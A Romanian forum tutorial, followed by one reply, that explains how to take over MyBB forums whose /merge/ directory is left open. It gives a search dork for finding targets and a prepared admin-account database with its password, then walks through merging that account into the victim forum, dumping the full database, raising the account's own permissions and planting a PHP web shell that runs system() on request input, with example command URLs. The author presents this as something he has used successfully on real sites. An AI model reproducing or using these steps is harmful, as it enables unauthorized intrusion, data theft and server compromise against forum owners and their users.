Exploatarea MyBB prin metoda Open Merge Directory

[MarAnd]

Aceasta metoda functioneaza in cadrul platformei MyBB, am folosit-o si eu cu succes pe cateva site-uri, desi nu este chiar o vulnerabilitate ci mai degraba tine de prostia administratorului site-ului.

Ce va ofera acest tutorial?

• Un ghid avansat despre cum puteti exploata un forum MyBB prin Open Merge Directory
  
• O metoda prin care puteti uploada un shell odata ce sunteti in interiorul panoului de administrare MyBB
  
• O baza de date actualizata continand un utilizator de admin pentru platforma MyBB
  

Primii pasi

Mai intai, descarcati urmatorul fisier SQL:

http://1drv.ms/1bScHpY

Apoi, creati un cont pe un website ce va permite importarea unei baze de date, de exemplu db4free.net - get a MySQL 5.6 Database for free, apoi logati-va in phpMyAdmin, selectati fisierul de mai sus, dupa care importati-l.

Baza de date contine un cont de administrator in grupul SECONDARY, din motive de siguranta, ca sa nu fiti vazuti online pe forum. Parola default a contului este "ballsack".

Acum, trebuie sa gasiti un forum care are directorul pentru merge deschis. Metoda mea favorita este sa intru in folderul meu Spam din mail si sa gasesc mesajele de gen "bla bla forum", prin care stiu ca nu m-am inregistrat pe acel forum. Odata ce ati gasit unul, accesati directorul /merge/ si vedeti daca functioneaza.

Totusi, putem fi mai profesionisti si sa folosim dorkuri pentru a gasi acest director merge, pe forumuri la intamplare. Un exemplu bun este:

intext:"MyBB Merge System - Version:" inurl:"/merge"

Exploatarea directorului merge

Odata ce ati gasit un website cu acest director deschis, veti fi intampinati de urmatoarea pagina:

Apasati pe "Next". Asigurati-va ca cele doua fisiere au permisiunea de a fi scrise, si apoi apasati din nou "Next". Acum selectati "MyBB 1.6 (Merge)", si din nou apasati "Next".

In cadrul paginii Database Configuration, apasati "Run" si veti fi directionati catre o pagina asemanatoare cu:

Aici intervine acea baza de date, mai exact veti avea nevoie de detaliile de la db4free.net ; introduceti informatiile (hostul este db4free.net) ca in poza, dar desigur inlocuiti informatiile cu cele ale dvs:

Verificati ca detaliile sa fie introduse corect si apasati din nou pe "Next".

Acum, selectati optiunea Usergroups, apoi, dupa ce ati completat-o si pe aceea, selectati optiunea "Users". In cadrul acesteia, veti avea o pagina asemanatoare cu:

Aici nu va exista nicio problema, deoarece avem doar un singur user nu va trebui sa schimbam vreo setare, deci pur si simplu selectam "Next".

Gata! Acum am unit cu succes utilizatorul nostru de form. Nu incercati optiunea merge si pentru alte lucruri, deoarece ar fi fara rost. In schimb, navigati in josul paginii si apasati "Cleanup". Nu va ingrijorati despre pagina "Completition", pur si simplu duceti-va inapoi pe forum si logati-va cu detaliile utilizatorului.

Dupa cum puteti vedea, pe forum aparem ca un simplu utilizator:

Descarcarea in mod corect a bazei de date

Exista un feature in platforma MyBB care ne permite sa descarcam bazele de date direct din ACP. Duceti-va la tabul "Tools and Maintenance", apoi selectati "Database Backups" din partea stanga. Apasati pe "New Backup".

Vom avea ceva de tipul:

Va trebui sa folositi optiunea "Select All", apoi sa schimbati tipul fisierului in Plain Text si sa apasati "Perform Backup", ca in imagine:

Am terminat si acest pas, acum aveti o baza de date completa!

Acesarea serverului din spatele MyBB

Aceasta parte este una avansata, nu la fel de usoara ca si celelalte. Avem nevoie de pluginul forumului "Page Manager". Avem o problema insa, acest plugin nu ii ofera default oricarui administrator puterea de a il utiliza, ci numai super administratorului, dar vom trece peste aceasta limitare.

Deci, sa urmam pasii. Duceti-va in prima pagina a panoului de administrare, selectati "Plugins" din lista din stanga. Cautati in lista si verificati daca "Page Manager" este instalat. Daca este, avem noroc! Acum duceti-va la tabul "Users & Groups", selectati "Admin Permissions". Selectati-va utilizatorul, apoi cautati in pagina textul "manage pages" si selectati "Yes".

Acum salvati setarile facute, si aveti acces la page manager! Duceti-va la tabul "Forums & Posts" si selectati Page Manger din stanga. Acum creati o noua pagina, aveti grija ca ea sa nu fie afisata in forum, dar sa existe. Vom folosi urmatoarea comanda pentru a avea acces la o linie de comanda tip shell pe server:

<?php $cmd = <<<EOD
cmd
EOD;
if(isset($_REQUEST[$cmd])) {
system($_REQUEST[$cmd]); } ?>

Acest script pur si simplu face un request serverului cu comanda introdusa. Acum, duceti-va pe URL-ul creat, ar trebui sa fie ceva similar:

http://hackedsi.te/misc.php?action=yourpage

Acum, pentru a executa comenzi, trebuie sa folosim urmatorul URL (in acest exemplu, vom lista toate fisierele din directorul curent):

http://hackedsi.te/misc.php?action=yourpage&cmd=ls

_____________________________________________________________________________

Sper ca v-a placut tutorialul, astept comentariile si sugestiile voastre!

[Silviu]

Felicitari pentru tutorial, dar din dork-ul tau, doar un site este vulnerabil. Oricum, apreciez efortul!